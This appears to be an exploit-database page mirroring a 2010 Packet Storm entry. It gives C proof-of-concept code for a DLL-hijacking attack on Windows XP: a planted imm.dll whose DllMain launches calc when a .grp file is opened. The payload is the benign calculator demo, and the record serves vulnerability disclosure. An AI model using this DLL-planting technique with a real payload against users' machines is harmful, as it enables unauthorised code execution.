Lucene search
+L

Windows Program Group DLL Hijacking Exploit

🗓️ 26 Aug 2010 00:00:00Reported by Alvaro OvalleType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Windows program group DLL hijacking exploit using imm.dl

Code
`/*  
Exploit Title: Windows Program Group DLL Hijacking Exploit (imm.dll)  
Date: 25/08/2010  
Author: Alvaro Ovalle  
Email: aovalle (at) zoho (dot) com  
Software Link: N/A  
Tested on: Windows XP SP3 English  
Extension: .grp  
*/  
#include <windows.h>  
  
int run()  
{  
WinExec("calc", SW_SHOW);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
run();  
return 0;  
}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Aug 2010 00:00Current
0.8Low risk
Vulners AI Score0.8
30